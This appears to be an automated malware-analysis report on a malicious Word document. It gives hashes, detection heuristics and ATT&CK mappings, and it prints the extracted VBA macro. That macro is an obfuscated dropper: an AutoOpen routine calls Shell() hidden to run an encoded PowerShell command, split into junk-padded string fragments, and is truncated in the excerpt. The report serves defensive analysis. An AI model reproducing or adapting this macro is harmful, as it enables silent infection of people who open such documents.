Office (OLE) malware analysis — malicious · 2d71c1a06cbc218b

MALICIOUS

Office (OLE)

108.5 KB Created: 2018-05-24 21:37:00 Authoring application: Microsoft Office Word First seen: 2019-04-17

MD5: 7956971acc34b8547a1b8c59d6d0f94c SHA-1: 15ba4dbdc451b1ca14057cfd9c1d444e3ae50f3c SHA-256: 2d71c1a06cbc218b0413ad6156325468cd042ac9c3f4e059780edb2de68f6bfe

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an Autoopen function that calls the Shell() function. This function is used to execute a PowerShell command, which is obfuscated but appears to be designed to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6556482-0' further supports the dropper functionality.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6556572-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6556572-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16870 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	16870 bytes
SHA-256: `5dc5262055339bc5f00b3236ed0302315a9ebe558b5466b3be758b9291da0ca3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "kqOMoFKRJsQ" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function NjKLbQT() On Error Resume Next Himajh = OipuJ - Cos(LPUtF) * 1 - Chr(22208) / 48014 - ChrB(FqlTdX) siIzwZ = 33105 HswNiV = LkkJs - Cos(UsrEO) * 1 - Chr(5137) / 3205 - ChrB(AHFJOW) huKzu = 42610 NjKLbQT = cnNAIqB + DFboHXQWCu + BCvkaWUDP + jIfLUNzKj + kZNGESzG + qWukAEc + jLUDHER + KphoOUVfta + wsXtB + hNvouYVz AGwqK = iBiTiP - Cos(lRvkX) * 1 - Chr(29906) / 3170 - ChrB(ltDUz) ipZMw = 6386 End Function Sub Autoopen() On Error Resume Next skFYs = MzYmi - Cos(wSPzaa) * 1 - Chr(59283) / 39447 - ChrB(PNuWK) ALIHj = 23599 rNfEPNrbB (NjKLbQT) tjpLi = oHMGZV - Cos(zOqzl) * 1 - Chr(37316) / 66939 - ChrB(cWLBh) MnQiw = 74153 End Sub Function rNfEPNrbB(jrKQf) On Error Resume Next ZjJOvh = zDGVBJ - Cos(lVJVN) * 1 - Chr(56660) / 30817 - ChrB(JiKzw) TvcbiU = 51134 jkqmDB = QqAYi - Cos(SGIkJR) * 1 - Chr(16066) / 50797 - ChrB(EwkDfH) uSprGo = 48123 tkRANkZFwuu = Shell(rHKpjlIoIbj + Chr(vbKeyP) + DDiwn + jrKQf, vbHide) baOrtn = ZOBBp - Cos(qZCSE) * 1 - Chr(3020) / 61191 - ChrB(BAVRlw) jrVdhd = 18551 End Function Attribute VB_Name = "CQhruZWCiSKD" Function cnNAIqB() On Error Resume Next uiSiTS = mPREPV - Cos(NjwkVH) * 1 - Chr(96893) / 30908 - ChrB(WFtvD) iBOpW = 86666 OtXDR = "owersHeLL" + " -WinDowsTyl" + "e hidden -e KA" + "AoACgAIgB7" + "ADEANgB" + "9AHsAMQ" + "A0AH0AewAxADI" + "AMQB9A" + "HsAOQA1" itdJI = HSQzA - Cos(cRUHwb) * 1 - Chr(77909) / 58983 - ChrB(wdaXmi) QpZzGo = 9979 JkXUoh = "AH0AewAxA" + "DAANgB9AHsAM" + "QAwADUAfQ" + "B7ADQAMgB" GMziI = FItRaq - Cos(uSOhO) * 1 - Chr(94648) / 65291 - ChrB(DlVpW) bXBXo = 24348 sIvoI = "9AHsAMwAz" + "AH0AewA1A" + "DIAfQB7" + "ADEANQB" + "9AHsAOA" + "A0AH0Ae" + "wA2AD" + "AAfQB7ADUAfQ" AjbJV = rUjFMn - Cos(WWLRsq) * 1 - Chr(44688) / 73863 - ChrB(adpmj) krtldr = 87726 tVDMSu = "B7ADEAM" + "QAxAH0Ae" + "wA3ADYA" + "fQB7ADU" + "AOQB9AHsANQA1" + "AH0AewAyADAAf" + "QB7AD" + "AAfQB7ADIANgB" + "9AHsAM" mXsFqv = jIBvi - Cos(Mjfzp) * 1 - Chr(60811) / 95713 - ChrB(zUjIN) pLbKjc = 77114 tbBnWG = "wA3AH0AewA1ADQ" + "AfQB7ADgAMw" + "B9AHsANwA0" + "AH0Aew" + "AxADMAf" + "QB7ADYA" tzljr = uVnrEZ - Cos(HOnoM) * 1 - Chr(92012) / 50008 - ChrB(CJwdKh) hrLBQ = 75968 hETZSYSw = "MwB9A" + "HsAMwA4AH0Ae" + "wA3ADkAfQB7" + "ADIAfQB7ADkAMA" fMIoRO = hsEnNh - Cos(nVXhOk) * 1 - Chr(81975) / 82218 - ChrB(Djwanw) CJkRia = 60678 OGIBpYlzwr = "B9AHsANAB9" + "AHsAMwB" + "9AHsANwAyAH0Ae" + "wA1ADcAf" + "QB7ADk" + "ANgB9AHsA" + "MgA5A" + "H0AewA4AH0AewA" cnNAIqB = OtXDR + JkXUoh + sIvoI + tVDMSu + tbBnWG + hETZSYSw + OGIBpYlzwr End Function Function DFboHXQWCu() On Error Resume Next iLMVQ = pzAXtV - Cos(UCDzoX) * 1 - Chr(11064) / 15573 - ChrB(oplMB) cPONqz = 5872 vUCiuTO = "2ADQAfQB7AD" + "kAMwB9" + "AHsAOAA2A" + "H0AewA4ADIAf" + "QB7ADEAMAA4AH0A" + "ewAxADEANA" + "B9AHs" + "AMwA1A" YUZvN = wCtarh - Cos(jRuCZ) * 1 - Chr(29673) / 20486 - ChrB(WkErL) kIjfo = 33915 mTzwwUEzlrB = "H0AewA0A" + "DUAfQB7ADcAN" + "wB9AHsAM" + "QA5AH0AewA" + "xADIAfQB7A" + "DQAMwB9AHsAMg" + "A4AH0AewA" + "2ADYA" fiOcsZ = lvKUT - Cos(vwUKQ) * 1 - Chr(70187) / 85385 - ChrB(BkVEBO) tMuDQ = 13554 RviJjwUbE = "fQB7ADEAMQ" + "AzAH0A" + "ewA1ADEAfQB7AD" + "EAMQAyA" + "H0AewA3" mfahq = maakXo - Cos(moWPD) * 1 - Chr(48529) / 40903 - ChrB(utXrKH) jPQDQu = 21237 iSCXb = "ADMAfQB" + "7ADEAM" + "QA4AH0AewA5" + "ADcAfQB7ADgA" + "OQB9AHsA" + "MQAyADUAfQB" + "7ADkAMQB9" + "AHsANAAxA" jjuDsa = ljMpb - Cos(pfzrl) * 1 - Chr(45936) / 85196 - ChrB(Dqfhur) TUYib = 98824 BoXSYhpwt = "H0Aew" + "AxADE" + "ANgB9AHsAMQAwA" + "H0AewAxADEAN" + "QB9AHsANgAyAH0" + "AewAxADMA" jJWcDk = qiVjm - Cos(kRMiWS) * 1 - Chr(7569) / 61060 - ChrB(OVzizS) oLzFC = 98898 WYNwlFDYd = "MAB9AHsAMQAz" + "ADEAfQB7ADEAM" + "AAxAH0A" + "ewA4ADAAfQB7" + "ADEAM" UJUHcN = KBIwZ - Cos(ItIIv) * 1 - Chr(14674) / 75046 - ChrB(BiUkqd) Kjjqka = 829 ... (truncated)

SHA-256: 5dc5262055339bc5f00b3236ed0302315a9ebe558b5466b3be758b9291da0ca3

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "kqOMoFKRJsQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function NjKLbQT()
On Error Resume Next
Himajh = OipuJ - Cos(LPUtF) * 1 - Chr(22208) / 48014 - ChrB(FqlTdX)
siIzwZ = 33105
HswNiV = LkkJs - Cos(UsrEO) * 1 - Chr(5137) / 3205 - ChrB(AHFJOW)
huKzu = 42610
NjKLbQT = cnNAIqB + DFboHXQWCu + BCvkaWUDP + jIfLUNzKj + kZNGESzG + qWukAEc + jLUDHER + KphoOUVfta + wsXtB + hNvouYVz
AGwqK = iBiTiP - Cos(lRvkX) * 1 - Chr(29906) / 3170 - ChrB(ltDUz)
ipZMw = 6386
End Function
Sub Autoopen()
On Error Resume Next
skFYs = MzYmi - Cos(wSPzaa) * 1 - Chr(59283) / 39447 - ChrB(PNuWK)
ALIHj = 23599
rNfEPNrbB (NjKLbQT)
tjpLi = oHMGZV - Cos(zOqzl) * 1 - Chr(37316) / 66939 - ChrB(cWLBh)
MnQiw = 74153
End Sub
Function rNfEPNrbB(jrKQf)
On Error Resume Next
ZjJOvh = zDGVBJ - Cos(lVJVN) * 1 - Chr(56660) / 30817 - ChrB(JiKzw)
TvcbiU = 51134
jkqmDB = QqAYi - Cos(SGIkJR) * 1 - Chr(16066) / 50797 - ChrB(EwkDfH)
uSprGo = 48123
tkRANkZFwuu = Shell(rHKpjlIoIbj + Chr(vbKeyP) + DDiwn + jrKQf, vbHide)
baOrtn = ZOBBp - Cos(qZCSE) * 1 - Chr(3020) / 61191 - ChrB(BAVRlw)
jrVdhd = 18551
End Function


Attribute VB_Name = "CQhruZWCiSKD"
Function cnNAIqB()
On Error Resume Next
uiSiTS = mPREPV - Cos(NjwkVH) * 1 - Chr(96893) / 30908 - ChrB(WFtvD)
iBOpW = 86666
OtXDR = "owersHeLL" + " -WinDowsTyl" + "e hidden -e KA" + "AoACgAIgB7" + "ADEANgB" + "9AHsAMQ" + "A0AH0AewAxADI" + "AMQB9A" + "HsAOQA1"
itdJI = HSQzA - Cos(cRUHwb) * 1 - Chr(77909) / 58983 - ChrB(wdaXmi)
QpZzGo = 9979
JkXUoh = "AH0AewAxA" + "DAANgB9AHsAM" + "QAwADUAfQ" + "B7ADQAMgB"
GMziI = FItRaq - Cos(uSOhO) * 1 - Chr(94648) / 65291 - ChrB(DlVpW)
bXBXo = 24348
sIvoI = "9AHsAMwAz" + "AH0AewA1A" + "DIAfQB7" + "ADEANQB" + "9AHsAOA" + "A0AH0Ae" + "wA2AD" + "AAfQB7ADUAfQ"
AjbJV = rUjFMn - Cos(WWLRsq) * 1 - Chr(44688) / 73863 - ChrB(adpmj)
krtldr = 87726
tVDMSu = "B7ADEAM" + "QAxAH0Ae" + "wA3ADYA" + "fQB7ADU" + "AOQB9AHsANQA1" + "AH0AewAyADAAf" + "QB7AD" + "AAfQB7ADIANgB" + "9AHsAM"
mXsFqv = jIBvi - Cos(Mjfzp) * 1 - Chr(60811) / 95713 - ChrB(zUjIN)
pLbKjc = 77114
tbBnWG = "wA3AH0AewA1ADQ" + "AfQB7ADgAMw" + "B9AHsANwA0" + "AH0Aew" + "AxADMAf" + "QB7ADYA"
tzljr = uVnrEZ - Cos(HOnoM) * 1 - Chr(92012) / 50008 - ChrB(CJwdKh)
hrLBQ = 75968
hETZSYSw = "MwB9A" + "HsAMwA4AH0Ae" + "wA3ADkAfQB7" + "ADIAfQB7ADkAMA"
fMIoRO = hsEnNh - Cos(nVXhOk) * 1 - Chr(81975) / 82218 - ChrB(Djwanw)
CJkRia = 60678
OGIBpYlzwr = "B9AHsANAB9" + "AHsAMwB" + "9AHsANwAyAH0Ae" + "wA1ADcAf" + "QB7ADk" + "ANgB9AHsA" + "MgA5A" + "H0AewA4AH0AewA"
cnNAIqB = OtXDR + JkXUoh + sIvoI + tVDMSu + tbBnWG + hETZSYSw + OGIBpYlzwr
End Function
Function DFboHXQWCu()
On Error Resume Next
iLMVQ = pzAXtV - Cos(UCDzoX) * 1 - Chr(11064) / 15573 - ChrB(oplMB)
cPONqz = 5872
vUCiuTO = "2ADQAfQB7AD" + "kAMwB9" + "AHsAOAA2A" + "H0AewA4ADIAf" + "QB7ADEAMAA4AH0A" + "ewAxADEANA" + "B9AHs" + "AMwA1A"
YUZvN = wCtarh - Cos(jRuCZ) * 1 - Chr(29673) / 20486 - ChrB(WkErL)
kIjfo = 33915
mTzwwUEzlrB = "H0AewA0A" + "DUAfQB7ADcAN" + "wB9AHsAM" + "QA5AH0AewA" + "xADIAfQB7A" + "DQAMwB9AHsAMg" + "A4AH0AewA" + "2ADYA"
fiOcsZ = lvKUT - Cos(vwUKQ) * 1 - Chr(70187) / 85385 - ChrB(BkVEBO)
tMuDQ = 13554
RviJjwUbE = "fQB7ADEAMQ" + "AzAH0A" + "ewA1ADEAfQB7AD" + "EAMQAyA" + "H0AewA3"
mfahq = maakXo - Cos(moWPD) * 1 - Chr(48529) / 40903 - ChrB(utXrKH)
jPQDQu = 21237
iSCXb = "ADMAfQB" + "7ADEAM" + "QA4AH0AewA5" + "ADcAfQB7ADgA" + "OQB9AHsA" + "MQAyADUAfQB" + "7ADkAMQB9" + "AHsANAAxA"
jjuDsa = ljMpb - Cos(pfzrl) * 1 - Chr(45936) / 85196 - ChrB(Dqfhur)
TUYib = 98824
BoXSYhpwt = "H0Aew" + "AxADE" + "ANgB9AHsAMQAwA" + "H0AewAxADEAN" + "QB9AHsANgAyAH0" + "AewAxADMA"
jJWcDk = qiVjm - Cos(kRMiWS) * 1 - Chr(7569) / 61060 - ChrB(OVzizS)
oLzFC = 98898
WYNwlFDYd = "MAB9AHsAMQAz" + "ADEAfQB7ADEAM" + "AAxAH0A" + "ewA4ADAAfQB7" + "ADEAM"
UJUHcN = KBIwZ - Cos(ItIIv) * 1 - Chr(14674) / 75046 - ChrB(BiUkqd)
Kjjqka = 829
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.